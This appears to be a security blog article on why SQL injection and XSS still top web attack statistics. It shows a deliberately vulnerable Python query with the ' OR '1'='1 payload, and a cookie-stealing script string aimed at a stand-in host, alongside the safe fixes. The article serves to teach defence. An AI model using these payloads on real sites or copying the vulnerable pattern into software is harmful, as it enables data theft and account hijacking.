In the beginning – when the web was a dark and primitive space full of ‘under construction’ signs, flaming Java applet logos and faux-mechanical hit counters – a proto-web developer crawled from the World Wide Web’s primordial tag soup and ushered in the future by hooking up a company database to a company website.
The website was no longer a document; it was an application: complex, sophisticated, interactive, up-to-date, personalised, useful even.
Not long after this epiphany occurred, a proto-hacker emerged from the same tag soup, took one look at this fine new creation and tried to attack the company database through the website using SQL injection.
And so it’s been ever since.
On the surface, modern websites have as little in common with their early nineties forebears as a 3D Pixar animation has with a magic lantern show. Under the surface, though, it’s a different story: the technology has changed but the basic underlying concepts haven’t, and neither, sadly, have the most common types of vulnerability.
Ever since websites sprouted input fields, hackers have used them to try their luck.
Instead of entering whatever the website is expecting users to type into the input field – a username and password on a login page, for example – hackers can try entering code instead: SQL commands for attacking the database, or HTML, CSS, JavaScript or XSLT for attacking the structure of the site’s pages (so-called XSS, or cross-site scripting).
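To see why that matters, here’s a minimal sketch (in Python, with a made-up users table – everything here is illustrative) of the kind of naive code that makes it possible: user input pasted straight into a SQL string.

```python
import sqlite3

# Deliberately vulnerable sketch: user input is concatenated straight
# into the SQL string (the table and data are made up for illustration).
def find_user_unsafe(conn, username):
    query = "SELECT id FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice'), (2, 'bob')")

print(find_user_unsafe(conn, "alice"))        # [(1,)]
print(find_user_unsafe(conn, "' OR '1'='1"))  # [(1,), (2,)] – every row comes back
```

Feed it a normal username and it behaves; feed it the classic ' OR '1'='1 payload and the WHERE clause becomes always true, so the whole table leaks.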
If websites are properly coded then anything anyone enters in an input field is scrubbed and cleaned until it can do no harm. If websites were properly coded then SQL injection and XSS attacks would have disappeared long ago.
Content distribution giant Akamai has just released its most recent State of the Internet Security Report and it includes a section on web application attack activity.
Top of the list for Q1 2016? SQL injection.
The second and third items on the list, Local File Inclusion and XSS (cross-site scripting), are as old as the hills too. In fact, if you removed the dates from the report, the only clue to what year – or even what decade – the web application attack section was referring to would be the presence of 2014’s Shellshock vulnerability.
And just to be clear, that’s not a criticism of the report. Far from it.
As we edge ever closer to peak hype, with every new vulnerability getting its own logo and PR makeover, we need an injection of perspective.
The Akamai report reminds us that coding a website so it’s protected from the kinds of attack it’s most likely to face is an old story. It’s mostly about doing some quite basic but unglamorous hard yards, thoroughly.
As the report puts it: “These attack vectors have remained effective due to coding issues that continue to crop up in websites. [SQL injection] is a problem that can be solved through coding techniques that include security checks. In the rush to move applications to the web layer, however, many companies still do not check for SQLi vulnerabilities and thus leave themselves vulnerable to attack.”
SQL injection can be killed stone dead by the simple expedient of using parameterised database queries – but only if you have the discipline to use them everywhere, all the time.
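By way of illustration, here’s the same hypothetical lookup done with a parameterised query using Python’s built-in sqlite3 module – a sketch, not a definitive pattern, and the ? placeholder syntax varies from driver to driver, but the principle doesn’t.

```python
import sqlite3

# Parameterised query: the SQL and the value travel to the database
# separately, so the input is always treated as data, never as SQL syntax.
def find_user_safe(conn, username):
    return conn.execute(
        "SELECT id FROM users WHERE username = ?", (username,)
    ).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice'), (2, 'bob')")

print(find_user_safe(conn, "alice"))        # [(1,)]
print(find_user_safe(conn, "' OR '1'='1"))  # [] – the payload is just an odd username
```

The injection payload simply becomes a strange-looking username that matches nobody, and nothing leaks.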
XSS can be eliminated by correctly ‘escaping’ a website’s output (ensuring it’s interpreted as content rather than as language syntax) – but only if you use the right escape syntax, and only if you do it all the time.
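Purely as a sketch, Python’s standard-library html.escape shows the idea for HTML-context output; the comment string below is made up, and attribute, JavaScript and URL contexts each need their own escaping rules – which is exactly where the ‘right syntax, every time’ discipline bites.

```python
import html

# A made-up user comment containing a script-injection attempt.
user_comment = '<script>document.location="https://evil.example/?c=" + document.cookie</script>'

# Escaped, the browser renders it as harmless text instead of executing it.
print(html.escape(user_comment))
# &lt;script&gt;document.location=&quot;https://evil.example/?c=&quot; + document.cookie&lt;/script&gt;
```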
That SQL injection, XSS and their ilk have clung to the web like stalactites for all this time has nothing to do with some fiendish inherent mystery or the elite skills of hackers; their staying power is testament to the fact that making a site that isn’t vulnerable takes a bit more time, effort and attention than making one that is.